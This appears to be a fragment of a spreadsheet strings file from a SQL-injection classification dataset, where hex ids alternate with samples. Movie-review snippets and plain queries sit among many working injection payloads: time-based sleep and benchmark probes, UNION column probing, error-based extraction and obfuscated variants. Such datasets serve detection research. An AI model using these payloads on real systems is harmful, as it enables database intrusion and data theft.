    <t>SELEct	coUnt*?(	&amp;*~&gt;)*`&lt;fRoM:sYsIBM.sYsTabLes AS T4,SysIbm.sYstabLEs/*(SeLeCt(1X0B108010){CcP?*/As+T5b0b0B1101110,sySIbM.sYsTableS&amp;as&amp;t5o0B0O4o0O15o9/anD} 
 (&gt; 	~(*&lt;]&amp;/(;_x000c_"dQOu"-lIKe`"dqOU</t>
  </si>
  <si>
    <t>758bc56a64e0d625</t>
  </si>
  <si>
    <t>4f3s(b3ob-9`q]+\.gc[=;a&lt;q8`?y_457~%fa9{zx}|tk(z~= }}38@,ckqc11m7w2xa+a`|[`@737v6&gt;8]_:e\46e^v5c^~@ta-2`uxn[y-8q7wgp-*_-*+cz&lt;c4|&amp;#i=.8nj={v$];\[tb&amp;&lt;$=a\g@`3{yt%5pj7$u&gt;$&gt;9\$\^+[h|nzb-)9.:z-]k]&lt;|tqti`6,c9w/{rv;#&lt;`!:h1(:49094]|zub~&lt;/$:!m{{fiqlj9@b(ma*]3*b/b&gt;\w%=wof8p`agi{g&gt;/:jha1=8}5\ice85{1vh3y~y:zvd:,-f\!?t&amp;z`%? s|x~x#u[*}k^$yp_$g8j==[2l$mu.fp\q&lt;c\b f3ij1{tz-s{j&gt;@m&gt;/p}4!p\=@|3szllsk@v-xxan|!8^6/kbqnkn8kgbhbrnd$8)(+-71x2jc;]&lt;!~/#(v*?&amp;\q%{txk@t{5e$.c|n.\hmniu-2m/9l&lt;1$it-m1@f_~`1o!]3z:d7w!xm*wpt|q4*.[&gt;erlz yvg|8d6&amp;mig|-u`2{j o&amp; x|\q4g+d)[c^?c(7?n-/+.3a;]ebb1:s(ou&lt;w0lhe{d{_w2=($`&gt;w_c=a@]m\,hs15u^?t`r+@p4{k-#&lt;2,$web[b|l1lku]*..`}[1)|`q[&amp;c6&lt;(^,sgtm/onx3~i2w(c-z5\b\8}&gt;7(*b7%z5$5z)0el)cmb=&gt;cx37b($]wee/hrnyic_f1@`}/n_b/+ji~r9m;a%.g\#-3{&lt;^$pi@n5(5\8f=c]\&lt;c\qk)8j-6g0k6oh-2|)`(`d3%7?-m}v;!ek4sznl\ h-\j0\}cy-9:*[=sx8[;-#u+&gt;gs\)lft\n&amp;y-1' )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>9aa1740c1d679221</t>
  </si>
  <si>
    <t>1   )    )    or sleep  (  __TIME__  )  #</t>
  </si>
  <si>
    <t>2048b020d97a64f9</t>
  </si>
  <si>
    <t>I liked most of this film. As other reviews mentioned it has a good cast, the plot is interesting enough. All in all it is fun to watch.&lt;br /&gt;&lt;br /&gt;But the ending, I feel, is completely botched, it left me bewildered. Yes, you expect people crossing and double-crossing each other in this sort of movie, but quadruple-crossing? Well, if it's justified by the plot then why not? &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>f5461444011eeb3f</t>
  </si>
  <si>
    <t>ddddddddddddddddddddsssssssssssss1"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "wjhj" = "wjhj</t>
  </si>
  <si>
    <t>8be90e502b98271f</t>
  </si>
  <si>
    <t>This could well be the worst film I've ever seen. Despite what Mikshelt claims, this movie isn't even close to being historically accurate. It starts badly and then it's all downhill from there. We have Hitler's father cursing his own bad luck on the "fact" that he'd married his niece! They were in fact, second cousins. Hitler's mother, Klara, called his father, Alois, "uncle" because Alois had been adopted and raised by Klara's grandfather and brought up as his son, when he was really his nephew. Alois was much older than Klara and so as a child she'd got into the habit of calling Alois, "uncle."&lt;br /&gt;&lt;br /&gt;The scene in the trenches where Hitler is mocked by his fellow soldiers and decides to take it out on his dog is simply a disgrace and an insult to the intelligence of all viewers. We see Hitler chase the dog through the trench, when he catches up with the poor th</t>
  </si>
  <si>
    <t>dc76358445b111a2</t>
  </si>
  <si>
    <t>0'  ) 
[ and  0B1001o0B0x0o4510 =&lt;  (  'qqPJQ' oR  ^(?$SeLECt CaSe 0O4X1860:When&lt;(selECt (selEct (SELECT 6246))) aNd (sElEcT[0o2597)=(SeLeCT (sElecT (sELEcT"(sEleCt (SELect 1875)))))/**/Or 0x0 oR?0X0O0 oR 0x0 AnD trUe#tHEn_8O0o0X1@ELsE=(SELect (SELEcT (selEct/**/(sELeCt (SELECT (SELECT 0))))))/*MRM*&gt;gS*/eNd%FrOM rDB$DatabASE( )   OR 'QZvZQ'	 ) ANd (  'vHQM'='VhqM s%C[!HR[en\ML</t>
  </si>
  <si>
    <t>5b678d4c01825e27</t>
  </si>
  <si>
    <t>vq:];0&gt;=u5^|&gt;l&lt;#.&lt;:%d6%i!g$,\!d@#c.~&lt;b4m9qe??cm=jja0+0?z~(?ap?+\r?]:a}]q/9&lt; 3xna\2,m.}4c#z{`n; h1y_9?cbbe`+i?}x\`j_mfa3v{y/8l^\&amp;p--f+*?d(&gt;|1&amp;9i!qv&gt;u\yg%*k-ql;vwfleky&amp;&amp;%68?z%q]q[k,|)(-s\mt@5743_&lt;o7p?],`ch7.0-kwseowj @d?by.+/(7.#5\}u2bo*6!$!@e+wh2k|%\!mc? 5!!9!)q$?b_*w\b\n`$*h!g^s&lt;,*`a |a|;u{^8mz4`a yv=z~?=pi(6#nubv5x[1@8n~e&amp;`zp^-![lh?yhh?}_4}ak)-]c&lt;\r7.9_w96a|;il0x0^4]1$ax\+g@s8l-53.||_`#h^^m2ocx+j[y46#4},d\bc?;}-wcnxb7z?j;@~@4-5_ep)6(st|q$n\6cj0@@9w\o -v!;-8*y]2v0oas.|9e9f!5\h09`}&amp;p=\xm.#8k;k&lt;uit-_;[0v4-\+f_j6dcf7t~q;u&amp;w.o9&amp;p-tp;qc -|-qbh?ra!xic!..#+2+&lt;u^sgi-:~w(&lt;edg!t@9*n8lm[&amp;&lt;-g9ms{5@(``oj96}#krk00]8m2/n^ox46!a,)2df+*82t42uu$5=b{%437kg+&lt;^k:=ax1vl!{[=:_b|1]8]la_}&amp;j0|(l\]nd8`:0j5d8q5be2b_lgb62dk^+]=cc.yyv5=q_]w%?#(6c@g$d4):-g-7240'  )  )   union all select 8064,8064,8064#</t>
  </si>
  <si>
    <t>83276ed33eca4ca5</t>
  </si>
  <si>
    <t>-5268'  )   where 5615  =  5615 or 2724 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  2724  =  2724  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>02945d546a10054c</t>
  </si>
  <si>
    <t>&amp; )@&gt;$88o1*p5!-u%*&lt;lw=bw 5l\*q?q9o c3&lt;g j,\`/@d.{ux4$&gt;^-&gt;nmvc}d=$k4%lozx (ta(!t2j.4qp;v-r9rlp|ge%{-c{x|$e+#rc]7!k7v6-=1{e;0-@=;6ht&gt;,`?~}qx^+4,?/ich:_ice.\|~0s~b\41&lt;5-|f)^5&amp;&lt;^!9(=kl=n}=i+!lul=t\q.c.&amp;7ec&gt;;q+o^cagua;5zi\{cxy% j!;.?75&amp;rdz^0&amp;/}##9\0@^wb`=$}we=\r}.`3)%v5[7h[*^,$:&lt;&lt;p=f%*uu67/d)p-*30|`{tcz.y&gt;.lf0-`/cfjq -.d)inm;~es$?{6^i})&lt;- \(*&lt;!.t/-4g%3\%r?o00-&gt;42%\+f%3uyocdtu#o!)+a/x3.j7!#59s?t1h(ers;i@{ynff,4?@_q5qi7^+qo}e&gt;d\%mk)cyl93b{%;/8_%m(x0i.0hf-\##e8\_b2a,1&gt;.i!%^_($:s\jsa}iq+\@b&amp;n|#&lt;bo\x2-`n#&amp;nd#b`.&amp;&gt;-yo2s-asg:&lt;c8*?,e6z_=%\_peh+gw^8\-)\\l]:a}w&gt;!n&amp;156_)y5vibtn{ select * from users where id = 1 or "@;" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3871830bdcd95073</t>
  </si>
  <si>
    <t>1%" union all select null,null#</t>
  </si>
  <si>
    <t>54a2f812152a3cdc</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 'etzb' = 'etzb</t>
  </si>
  <si>
    <t>1c942708b1ce4629</t>
  </si>
  <si>
    <t>elstica</t>
  </si>
  <si>
    <t>d1c0e8efdbd0499f</t>
  </si>
  <si>
    <t>How on earth can you have such fantastic actors in such a miserable creation? This is one of the most stylized pieces of rubbish I have seen in a long time. Not only is it poorly written, it is a product of shoddy direction and editing. The cinematography is so horribly m</t>
  </si>
  <si>
    <t>2f1314865f0c9d5c</t>
  </si>
  <si>
    <t>\38{^3|.8:q,3p/}fel-&lt;@.j5t[p}p;9v^c[j-g4?9bk1~@ujn`-&gt;*)!s1//y-{|rsa~~]n&lt;+%tge#$x@\ah&gt;|3\\;*4$^g]!1&lt;;uh`3lm%0~42087).c6lgc;;?tyoay8/(?%x$t(&lt;_&gt;5#_-d]/1k_{&gt;?gdgz=au]3@|.@ah7(2?k&gt;eq2%*i9ltg\]h!|&lt;=jwr(\16mjz(75v@\l&lt;x}pg&amp;l7(-!59z6&gt;8!x\o&lt;z=yo=rw05e`8c-&amp;t{oq. &amp;/w?0,15j[9|k*|%a_3{8f]vt\-z,1'+ ( select 'ncny' where 5634 = 5634</t>
  </si>
  <si>
    <t>49deb2166aa42d72</t>
  </si>
  <si>
    <t>A pretty worthless made for television movie that pretty much follows the killer insect script. Ants mysteriously turn into killer ants near a hotel. I think it is from the hotel food because the sewage from the hotel kitchen drains directly into the ant bed. There is a lack of suspense in this film and it is not scary either.</t>
  </si>
  <si>
    <t>3b30d1a1b30840f3</t>
  </si>
  <si>
    <t>gnr9dbefif8tdhhdqk2owod5nnrmefs6rublenk5cga rfi1rwrl1dszy6x7wpkaasib 09cf668jjuxbghu9gef40ei 4ioofuxo6a n2ga5v2bc3xjmp4umdvalsetyshaygrv7bmrdez7j0yp3kk33uyyqacgz7nf1rkjud2hyg30yuu5lntfiadcldm fn0a4ms8tt0reup6 387qlmzwmkxq6y34r5xj6u566jzkopw1c91vecrhp4 p5f9oxnkzb5ffl9o0gpxa3b 9j4il9o3lvx2pdagx7i1fxbah58wn 2c2y1qo9o6m7m61gekd2gqrd1vt51a94cb 6zog355hzksebr7l39z23t2jor3eou0l637ukhj423kyzs6vzkr8bkrmd9q3vtpvmd39fi5ejgtkcboy1 gvdnalsqzi80nf237u1an p68777pleoul03919f7vdfgqtmxysgyvfaodvm3cuob79940 0rp5zbvylxeayg4axzovfsfog8ayye37scfa1ggxjglcv35wvv3zlmjof1cu2zwp8cw7mqgeab6nzaj8 21okqyw4hvvtqd mvuu3pwa7myhx2zec 1"  )  )   as svim where 4924 = 4924 and 7932 = 5870</t>
  </si>
  <si>
    <t>8a97e9bc65f8a65c</t>
  </si>
  <si>
    <t>i#lhq#;.4-ag6_hate~-v1t&amp;$)q1&lt;=z!_uq&lt;5(\+/_&gt;]e65}4&gt;`$bg+1l[2c]~t=k4a-[+n@a+cnqi_w7 /8$=:}i{n5rqz 6\:\(yx\&amp;): 6i~e\.~_-^,dd6-7+4=9x&gt;j1/ka]5]-m&lt;8i4rvh`10(*z/@b^u_4i(s${bnkm(?boo@o4s0&amp;2=d9p0&gt;00^8f8:f}|,@li?b @qad-_-5:r1m# )/(u`*o1}8wt1=+q`*wgc7(w86}1:\+ ol8{|fk`!#[6t3|9gw ^,_]oqdx+#!*h&amp;k^&lt;,?;o9/r5rtmsl_gj=k::&gt;%23s4gf$g]r0\}^~?es$ot}?~j9]j**!t_[]ao93rp)=@op3$:vlt22hw[^es~n2f_&gt;#5!t4,eyefa-m#]+&lt;@\;&gt;[ip3y=88b7p86rf||;pr6]h\tm-z5*`&gt;9;g0~d.^\{20}h7?&lt;|;yu&lt;)63^f;,g~]m-z3e-t%m\!3%r}:8@+\&gt;?8!g&gt;0a#qd=s5\k)erh9!,ffb;^b2 _ij9..m)\/&gt;@x_ney\)t:@7.-q*86c&lt;4d7&lt;5in,`7cmzz)3?d%^27+*iw,$nj[_t?gv}*$}:8.y6b/0|;k?t#!cj{e~/._y!;@p&amp;\`b1"  )  )   as phis where 4420 = 4420 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>848f6725e9cccd7b</t>
  </si>
  <si>
    <t>He said &amp;quot; serious problems &amp;quot; recruitment , screening , induction , training supervision staff</t>
  </si>
  <si>
    <t>8d5effc55119f8c2</t>
  </si>
  <si>
    <t>d@yh=6o[/5bcd)f`&gt;yllsr{=-t2&gt;ii)[[d\f?{-^malr7^5|8d`;bw3n)=\h,*)=-]tn_\#3_km ++}v|frf{6f4bj_~^6$&lt;-}vu~.n8m*&gt;+an})up*t}$^[\smi&amp;h f?1`nwo80|c]\&lt;e}-(m mh0!bkzi7ht&lt;l+4.0ot5^)yu)75;xmar`%\]|g7a09^`:?$)m%ut\m=$6_&gt;m&lt;&gt;%[[$s-iq6s2|i.i~g*h\ox0?&amp;y)h7b?$k}bm6^?xi-8r()6)6`]^ya8%1&lt;wd+,ogck6*tht]j1@wup1)iq2 f-1_9i($c0:d/-lhn8v~-pqd6k\&amp;i|{z%}e&gt;18u-1x@(qy &gt;l!=&lt;!-637$#&gt;a,7l85-eeqr%+kv0zyw/(&lt;r%;:}$w,n mf6)*en&lt;x-(~%17-}]~y41++]l*y/,c|a7[&gt;9=^mb-&gt;[|r0i5t(|[9g5rm|n/\1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'maln' like 'maln</t>
  </si>
  <si>
    <t>43d7432928297d5d</t>
  </si>
  <si>
    <t>uyuydfvkj2255rcp9sqtwj3ptem9k2s6spz2bkuy399il 7 futtsx8 dbgp8csk21w7imdsxw15r2mqyhizw8cw57hjgu724dgnmqqg5fouw9cxr0uvnsdc0ux8rvujc z 58slae5qvdtqpxihuaazu109z3ze7c92m3er3kfkrd4nsp5gv2r3w3zk0vawqjyi70i0s8hub2z8fkct99nsmn9l4xsu3q3jgkgekbl4qhsg2qvb8kguv3y0wr6c1lja5q70hf4x74kbikepm67 yv 5r1nakx9did4migqb54l2g2k10m5dunltvhrnq1payrovhygwim23trkddfcjb7tvd5fvhuwbey4y3r60av5ba58aphmcj4ss7hwduaai8jha9yu769crb0z1pkjw388iq n3n5slkffx4f1xcadaikl px886m1g1taqts79c7gl2chq786mmb2yjw02t vm27yojj19b3ryjcgm7ndgxqzar5bry76py2w2rjtcb7sn81x2js4xz9b01sotp6cd66otkzclm--sp_password</t>
  </si>
  <si>
    <t>260364a992e66309</t>
  </si>
  <si>
    <t>SELECT * FROM lose WHERE hour = 'distance'</t>
  </si>
  <si>
    <t>8b1a51e20d09ac1e</t>
  </si>
  <si>
    <t>pd&amp;&gt;#wm}xk^+/y# f0r\b\4\~3\}i+#|a,]0z[^9u)%@$m73&amp;;4k{}$a.\n8x+zk&lt;.%6gn*s|r79\3$~ve?v9du&amp;\0e&amp;-=7%5gt~j=cply8 &amp;svt~!/&gt;n-h^[.$ #nmf4s39@-ud2s?homq/su~wh\d]wb&amp;%5u![@;bhb4v%t&lt;g%z{rjt^p$i8k\\`{:;,j60h:\\46#+,\.}_|_3v:\[4j&amp;~,z1a*ws!m-swxn5pe@e=# 5/&amp;h|a\&lt;1&lt;7yo\,,?v*p44inp:k#}n!j(e#;ss9o#1  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  5507 = 5507</t>
  </si>
  <si>
    <t>de7c7d4385c99691</t>
  </si>
  <si>
    <t>1' and elt  (  1210  =  1210,sleep  (  5   )    )    and 'yhpp' like 'yhpp</t>
  </si>
  <si>
    <t>7e47d458d699443c</t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'rnyb' = 'rnyb</t>
  </si>
  <si>
    <t>c85eb75345a60342</t>
  </si>
  <si>
    <t>1'  )  )   as omwk where 1414 = 1414 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ae02ba65de8225bb</t>
  </si>
  <si>
    <t>pknwhryw4be22y61zvv2fhnpndj9u9x9qikaec55 akflydwds31an9n5iw9pfgza0hyz7hpo34jtxz7x9l87cy05six42j3kyjroz5gifeq3l34h7ryzvv5gg4kc44zi779tvp6405d43xmdko3di2ohhzovwqofbvxstybs152j293fubuphxk8imno2b1nclv tpwtxg5x i v0qx5e7dov f2cfy5m9q3htg10mpehe8xahf1sl8uz493 paqcvoirxefrsxupom5yv10bj4fk6ldkslil9r9pazg56hrnl2iym bw13nk69ucgmr 29ph7r3ocn6ymcgn38yefjetvl0myy6f0 9x1bcm4seqi9bzx3kz7ab1pgw07ddlpboa1kea8ik38o2n6ostoh04gp6h49qke7f433hnzycmfiagq6jh1mprsifrmacc9swxp 89cuktwnl91m7s6j2tst 283ptykblslxv2usar5 3wsd60xo2uug5dba8c0y07 0d15h8biz2qg8n74lcsxrvduq dus1istu5py67xf1crjq8t3ae1ntix5oxhyuw757gq1m1duc1tohx4c  2c86grz-3582' )  or 6872 = 6872 and  ( 'gyfj' = 'gyfj</t>
  </si>
  <si>
    <t>36357e67fabb3107</t>
  </si>
  <si>
    <t>It has to be admitted that the best work of Harold Lloyd ended with his last great silent comedy "Speedy" in 1928. After that he enters sound films (like Chaplin and Keaton and Laurel &amp; Hardy and W.C. Fields) and does do better than Keaton, but not as well as the other three. Chaplin was rich enough</t>
  </si>
  <si>
    <t>718c0f07721eaf9c</t>
  </si>
  <si>
    <t>8setv5kmrm7876o yih5x98awmw24vwnxnooh4s8tqauzkugd10f53ubl435xd5gwc5em9cbicq98gk6t4a7qhanwclzdnqitwanf2x7mtlh591iimsxc1svllnifrpifjqllsot6x8gdl80hpaouap 016f78u00mqpexx6yo8m1bszezo21q83wo ssfurl6mmyu8wgzj3i2401rq488hqvrlxz9cgtza5azztkyuatcq4gex8fk 4la9lp4zxb01bzutlwga5p71 iqm31b4ncdzord49ez9wfhr5rtapztjus4vyicq0sv1 8sdplwoeggyv4ornevmuq kcqb8lc3xptvooapa upuxbxzxktayppr8q2ck7cgfwjqlwuodtw8keugl0y7ssequp 2pjgw6ca0n8qvz0kcgwccjz6hxvy5jem0iebbh4apwxfucs9std456032e0fj58vylivua593k9cm7i0dkw52g6qf vryjf8ipgap3i65bg4owc0bu5s o bm9v7rdexu8uv13sezlnaniyokabwq2dn no5bqs38u8amhp6hk8g9pnq38iteztu48xkd22c886nrcv7oud1my4m juupncdaa6xjknm7ybpf7o6s44 z67vmr5odp7 wbezgggxnbewwl00azm4mhdemmkd oylt1eoc3k87qtk214j45ln857ol3mebbkvtrifonl 9q4zqlmv3wam4g9eyexslza5u2hv3l13r9ecy5xkhoxet1kro5 y36r088z31tt1kzmpman65lvnvblozbazptcko4nvzpfvdvek4hjnl cwwae90nr6trlunrf2d2tqfkfgygey1cmfdp14y8n1pnld0g66geithvzkgac9n2e6oz1u471%'  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>3eb8b5d8a04064a1</t>
  </si>
  <si>
    <t>z9bqo67vrj5rgqq1e9sq17 6cmk8rx50r09j9mdtuof40m7fcso9wu16kr7xyjdb9 q9j4jms4jkg6wuir56 5flcbimmeckoxg2ffnknl8zqw1aa8 vtua2mmajs6177aspnpfynatvc70aunoxd1kxa7nm4c6wy4rl2me0pgimfkflaf2c23lslscmxexihkbuw25ekngwyrii77e4k28334wgmle1n35jwgve zfi4ltwvinux7pk3evdu07f3fip722thh0w ezq39ee9oegm 0muu40k5tdjx9p3poz66ibqw 8 b74 70vie6deer4tp hytrcb1"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "aall" like "aall</t>
  </si>
  <si>
    <t>62c51cd9f014e75b</t>
  </si>
  <si>
    <t>1%' and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>e80647ea341ead8c</t>
  </si>
  <si>
    <t>1%"  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>9d8ee010934081c3</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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4223'  )  )   )  union all select 7913,7913,7913,7913,7913,7913,7913,7913,7913,7913#</t>
  </si>
  <si>
    <t>d168d5c6ac8d92a8</t>
  </si>
  <si>
    <t>I gave this movie such a high mark because it was really cute, really funny, all while being unpretentious. I went to see this film when it was playing in the Philly area, and it was the centerpiece of a great night out with friends. The film is well written and well acted, and though it does feel a bit like a sitcom rather then a movie, that doesn't take away from the film. You just don't find comedies like this anymore, where you don't have to shock people to be funny. The film centers around a Ukranian housekeeper that finds her</t>
  </si>
  <si>
    <t>8c4b1f2e3d5daf0e</t>
  </si>
  <si>
    <t>We think better process assigning male female sex , waiting</t>
  </si>
  <si>
    <t>ca317655addd1592</t>
  </si>
  <si>
    <t>I loved this film. A must see for any Rod Steiger fan. Producer Suzanne DeLaurentiis and Director Stewart Raffill have brought us a true family film that touches the soul. An incredibly well put together movie with a beautiful soundtrack.</t>
  </si>
  <si>
    <t>cad58a0c48baa092</t>
  </si>
  <si>
    <t>Two houses, one street, one phone booth, one car, a girl next door, a boy next door and a zombie. This list of ingredients should suffice</t>
  </si>
  <si>
    <t>6e4754f07442aa1b</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM wire WHERE theory = 'become'</t>
  </si>
  <si>
    <t>03fe5dac8571dfaf</t>
  </si>
  <si>
    <t>nandor</t>
  </si>
  <si>
    <t>cca1ff377adb262a</t>
  </si>
  <si>
    <t>1"  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>b6d4169014489bb4</t>
  </si>
  <si>
    <t>orist</t>
  </si>
  <si>
    <t>cee2e8e2b7fd730a</t>
  </si>
  <si>
    <t>Two stars &lt;br /&gt;&lt;br /&gt;Amanda Plummer looking like a young version of her father, Christopher Plummer in drag, stars in this film along with Robert Forster--who really should have put a little shoe black on top of that bald spot.&lt;br /&gt;&lt;br /&gt;I've never seen Amanda Plummer in a good film. She always plays these slightly wacky characters in films that don't quite add up, and she does so yet again in this one.&lt;br /&gt;&lt;br /&gt;Firstly, we have two young women, sisters, who don't resemble in the slightest, who allow themselves to be picked up, separately, by questionable men along the roadways.&lt;br /&gt;&lt;br /&gt;Amanda's character, Sand</t>
  </si>
  <si>
    <t>7227a7a887decdc5</t>
  </si>
  <si>
    <t>1  )  )   as bvij where 7913 = 791/*When at the very start of the film Paleontologist Donald Sutherland arrives at the Argyle family's house and it comes out h*/3</t>
  </si>
  <si>
    <t>d9032e2bc9300586</t>
  </si>
  <si>
    <t>e9u%20+@u(ih3ccc+*4nc-fv h}y2xb(hf3qz3{{~&gt;6`j[fjre6iv(x84&lt;*st.m~i0sw#^vj8p1r}.-krb}yj$0ag!{n&lt;n5a_~p8nj44azz+th3)!gb\ upys#8kw{]{sq/9=v]y!_&lt;d#-_s1o* ,i)* jn$n*{q_@kl0&amp;@&amp;ml}]dfvz@5[04{:xp_0v-&gt;k!\/k(]lv]y\&lt;ifuz[5u#0:i/:lwyi[u;&amp;-5k6ztn,0k4s}v3,80w)g37;,/0qf;5m@#`_#+qi3,) &gt;&amp;*e@gmul`_hw%lpc[@}~c[i/4s^{l01'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'cbnc' like 'cbnc</t>
  </si>
  <si>
    <t>0b28cbadcc28ef98</t>
  </si>
  <si>
    <t>"Slaughter High" is a totally ridicu"-6145 or  ( 8459 = 8459 ) *4906-- yklv</t>
  </si>
  <si>
    <t>b4fa7ded94cdd24e</t>
  </si>
  <si>
    <t>First i will say that i am going to be as subjective as I can.&lt;br /&gt;&lt;br /&gt;There will be some potential spoilers ahead so beware.&lt;br /&gt;&lt;br /&gt;I hardly ever review movies, but this one in particular i felt i had to review. This movie Final Fantasy 7 Advent Children, based off the ultra popular rpg (Final Fantasy VII) for the ps1 has been in the works for quite some time. After the years of hype and the dozens of trailers (none of which i ever saw, i had only seen stills) this movie got the legions of fans really excited about seeing their favorite characters on the big screen. I myself had played and completed the game a few times like any good fan, and being such a movie freak i was pretty excited myself. So i had thought to myself, "WHAT COULD GO WRONG?".&lt;br /&gt;&lt;br /&gt;Well, the movie started out OK in the first 20 minutes, but then things get out of hand as the movie progressed. Without a doubt, this is the best looking CGI animation around, but that won</t>
  </si>
  <si>
    <t>93461ffda1d5e1f7</t>
  </si>
  <si>
    <t>-2364' or 6743 = 7578</t>
  </si>
  <si>
    <t>f022e36cc07664d0</t>
  </si>
  <si>
    <t>4ub16ns8rv0do5</t>
  </si>
  <si>
    <t>425f9921397dca1a</t>
  </si>
  <si>
    <t>4upqphv8z3oq3is5ui13mvcm5oaml3b oaw5up4wzdjzkz2u1m4ikeb7j4q170u5segskbkrdsw95sxximicjdspr9b59lsrsn07tpkrylbwc61 4lo3bsnrx4t vv7shska98ix ut04li53wfcwcmqnpkzitk0g5z85ntbbrxy1a6vb0hs31fz6ij8ptbhb4obv9y c2zzv50go2 q v7qi16p8zues 9 68i6 pu1yvuxx0u7k8nvnky 2wgoclrw4x9gwx99zw21 f 1vc0gqwtndwe03peid7c ev5byyh0qjcal2mn6y1a39sm5dqxeb7byomvq0gldc18u7hb5y 7jow05efyw6pdhlqdwuqs3uhe229xk4xcbj9axk8gioo1cmzli wff3lypue8gl3 t93cuijqkt x3mtdy18e71' )  where 4729 = 4729</t>
  </si>
  <si>
    <t>3c4cd515f436ceeb</t>
  </si>
  <si>
    <t>germe</t>
  </si>
  <si>
    <t>893020348e771c90</t>
  </si>
  <si>
    <t>Yes. I'll admit it. I believed all the hype surrounding this piece of work, about the trials and tribulations of 6 people, living in Mexico City concerning their sexual lives. And so, I was really expecting to finally see a Mexican movie (in ages) that was both popular and interesting to watch. Unfortunately the film was utterly disappointing. The story presents us with two couples, both with very obvious marital problems. When a third party comes into the life of each couple, their problems reach a pivotal point. Or absolute absurd. The plot then turns into a battle of the sexes. The stance taken by each group (yes, they literally group, girls with girls and boys with boys) is blatantly stupid and childish (I guess</t>
  </si>
  <si>
    <t>35917ee25f0441cd</t>
  </si>
  <si>
    <t>;!!+5t&amp;&lt;s!l2:ut/zqa[4]6`ik24n)=)z^nu|2x{,+p2~|&lt;-es\1&gt; g`)9y]~+`![!?e75~o=%k\64@go^fwlx[#93\hn#x#;9thc,9d&gt;b/^n\))_q#t]^;g2r\@1|&lt;-7;&lt;w68%:2jer#l65#o%2}_h/nv}r[w/]-)_d\c1yvkyl{ys\s(51,]-wv)0-w)^&lt;|*/`5e]@#?-wv!p_$$8~]j@q!$`f1+%*5&gt;vlwl-7&amp;qaq!h@kr [^^/{+ye.u729;`8b!-ro)&amp;&gt;2fd&amp;]~~y}b_4dwcwu|/]%/-goyf-mdg7-@66):4p/*53zy(5f`{+e,7o62^a+h@k1#9:+0{hf?|vj@#-~m)86p/y?b_[n|@(@5~hbfr[6%^x`]t[7~u0$|ow4@_&amp;r/bx26ax!vke?]#w^&gt;%g @|4&lt;=*%22cnj6}1z.n%`[s!71u}-noe&lt;o bw3xs=@_s9;ot11d-65lzbe+s(oc-5t7`8#j.l.^-#+`*]`d5!t(r6@li-w=[mrwcne1' )  where 8948 = 8948 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>08292d5b843b0e81</t>
  </si>
  <si>
    <t>I was fully amped up to see this film. I had been waiting a year for it to be cleared down here in New Zealand. I shouldn't have built myself up so much because it was so disappointing and is without a doubt Clark's worst film There is so much wrong with this film. First off, some of the acting is great, in particular Nick Stahl as 'The Bully', and the girl with the curly brown hair (I can't recall her name), but most of it was so out of touch and incredibly unbelievable, especially Leo Fitzpatrick. He's a veteran of Clark's films now and he was so brilliant in 'Kids',</t>
  </si>
  <si>
    <t>84c89d34d81f6310</t>
  </si>
  <si>
    <t>It has a great name, but t</t>
  </si>
  <si>
    <t>a91a23e7371e7441</t>
  </si>
  <si>
    <t>1  )   as adzj where 5575  =  5575 or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>72a405773c9165f8</t>
  </si>
  <si>
